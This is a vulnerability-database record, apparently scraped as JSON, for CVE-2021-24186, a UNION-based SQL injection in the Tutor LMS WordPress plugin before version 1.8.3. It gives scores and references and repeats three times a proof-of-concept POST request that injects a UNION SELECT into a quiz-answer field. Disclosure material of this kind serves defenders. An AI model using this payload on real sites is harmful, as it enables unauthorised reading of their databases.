DATABASE RESOURCES PRICING ABOUT US

{"id": "WPVDB-ID:5F5C0C6C-6F76-4366-B590-0AAB557F8C60", "type": "wpvulndb", "bulletinFamily": "software", "title": "Tutor LMS < 1.8.3 - SQL Injection via tutor_answering_quiz_question/get_answer_by_id", "description": "The tutor_answering_quiz_question/get_answer_by_id function pair from the plugin was vulnerable to UNION based SQL injection that could be exploited by students. \n\n### PoC\n\nPOST /courses/first-class/tutor_quiz/test/ HTTP/1.1 Host: [URL] Content-Length: 413 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: [URL] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: [URL] Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [COOKIES] Connection: close _wpnonce=[REPLACE_WITH_VALID_NONCE]&_wp_http_referer=%2Fcourses%2Ffirst-class%2Ftutor_quiz%2Ftest%2F&amp;attempt;_id=1&amp;tutor;_action=tutor_answering_quiz_question&amp;attempt;%5B1%5D%5Bquiz_question_ids%5D%5B%5D=&amp;attempt;%5B1%5D%5Bquiz_question%5D%5B1%5D=1 UNION select 1,2,3,version(),5,6,7,8,9,10.11,12,13;--&amp;attempt;%5B1%5D%5Bquiz_question_ids%5D%5B%5D=2&amp;attempt;%5B1%5D%5Bquiz_question%5D%5B2%5D=5&amp;quiz;_answer_submit_btn=quiz_answer_submit Then send a GET request to http://[URL]/dashboard/my-quiz-attempts/attempts-details/?attempt_id=1\n", "published": "2021-03-15T00:00:00", "modified": "2021-03-20T16:49:33", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "href": "https://wpscan.com/vulnerability/5f5c0c6c-6f76-4366-b590-0aab557f8c60", "reporter": "Chloe Chamberland", "references": ["https://www.wordfence.com/blog/2021/03/several-vulnerabilities-patched-in-tutor-lms-plugin/"], "cvelist": ["CVE-2021-24186"], "immutableFields": [], "lastseen": "2021-04-12T11:33:09", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24186"]}, {"type": "wpexploit", "idList": ["WPEX-ID:5F5C0C6C-6F76-4366-B590-0AAB557F8C60"]}], "rev": 4}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24186"]}, {"type": "wpexploit", "idList": ["WPEX-ID:5F5C0C6C-6F76-4366-B590-0AAB557F8C60"]}]}, "exploitation": null, "vulnersScore": -0.2}, "affectedSoftware": [{"version": "1.8.3", "operator": "lt", "name": "tutor"}], "exploit": "POST /courses/first-class/tutor_quiz/test/ HTTP/1.1\r\nHost: [URL]\r\nContent-Length: 413\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: [URL]\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nReferer: [URL]\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: [COOKIES]\r\nConnection: close\r\n\r\n_wpnonce=[REPLACE_WITH_VALID_NONCE]&_wp_http_referer=%2Fcourses%2Ffirst-class%2Ftutor_quiz%2Ftest%2F&attempt_id=1&tutor_action=tutor_answering_quiz_question&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=&attempt%5B1%5D%5Bquiz_question%5D%5B1%5D=1 UNION select 1,2,3,version(),5,6,7,8,9,10.11,12,13;--&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=2&attempt%5B1%5D%5Bquiz_question%5D%5B2%5D=5&quiz_answer_submit_btn=quiz_answer_submit\r\nThen send a GET request to\r\n\r\nhttp://[URL]/dashboard/my-quiz-attempts/attempts-details/?attempt_id=1", "sourceData": "", "generation": 1, "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1646021958, "score": 1659843777}, "_internal": {"score_hash": "ae356465ff8c02f07f60898347087f80"}}

{"cve": [{"lastseen": "2022-03-23T14:48:54", "description": "The tutor_answering_quiz_question/get_answer_by_id function pair from the Tutor LMS \u2013 eLearning and online course solution WordPress plugin before 1.8.3 was vulnerable to UNION based SQL injection that could be exploited by students.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-05T19:15:00", "type": "cve", "title": "CVE-2021-24186", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24186"], "modified": "2021-04-09T19:15:00", "cpe": [], "id": "CVE-2021-24186", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24186", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": []}], "wpexploit": [{"lastseen": "2021-04-12T11:33:09", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-24186"], "description": "The tutor_answering_quiz_question/get_answer_by_id function pair from the plugin was vulnerable to UNION based SQL injection that could be exploited by students. \n", "modified": "2021-03-20T16:49:33", "published": "2021-03-15T00:00:00", "id": "WPEX-ID:5F5C0C6C-6F76-4366-B590-0AAB557F8C60", "href": "", "type": "wpexploit", "title": "Tutor LMS < 1.8.3 - SQL Injection via tutor_answering_quiz_question/get_answer_by_id", "sourceData": "POST /courses/first-class/tutor_quiz/test/ HTTP/1.1\r\nHost: [URL]\r\nContent-Length: 413\r\nCache-Control: max-age=0\r\nUpgrade-Insecure-Requests: 1\r\nOrigin: [URL]\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nReferer: [URL]\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: [COOKIES]\r\nConnection: close\r\n\r\n_wpnonce=[REPLACE_WITH_VALID_NONCE]&_wp_http_referer=%2Fcourses%2Ffirst-class%2Ftutor_quiz%2Ftest%2F&attempt_id=1&tutor_action=tutor_answering_quiz_question&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=&attempt%5B1%5D%5Bquiz_question%5D%5B1%5D=1 UNION select 1,2,3,version(),5,6,7,8,9,10.11,12,13;--&attempt%5B1%5D%5Bquiz_question_ids%5D%5B%5D=2&attempt%5B1%5D%5Bquiz_question%5D%5B2%5D=5&quiz_answer_submit_btn=quiz_answer_submit\r\nThen send a GET request to\r\n\r\nhttp://[URL]/dashboard/my-quiz-attempts/attempts-details/?attempt_id=1", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}]}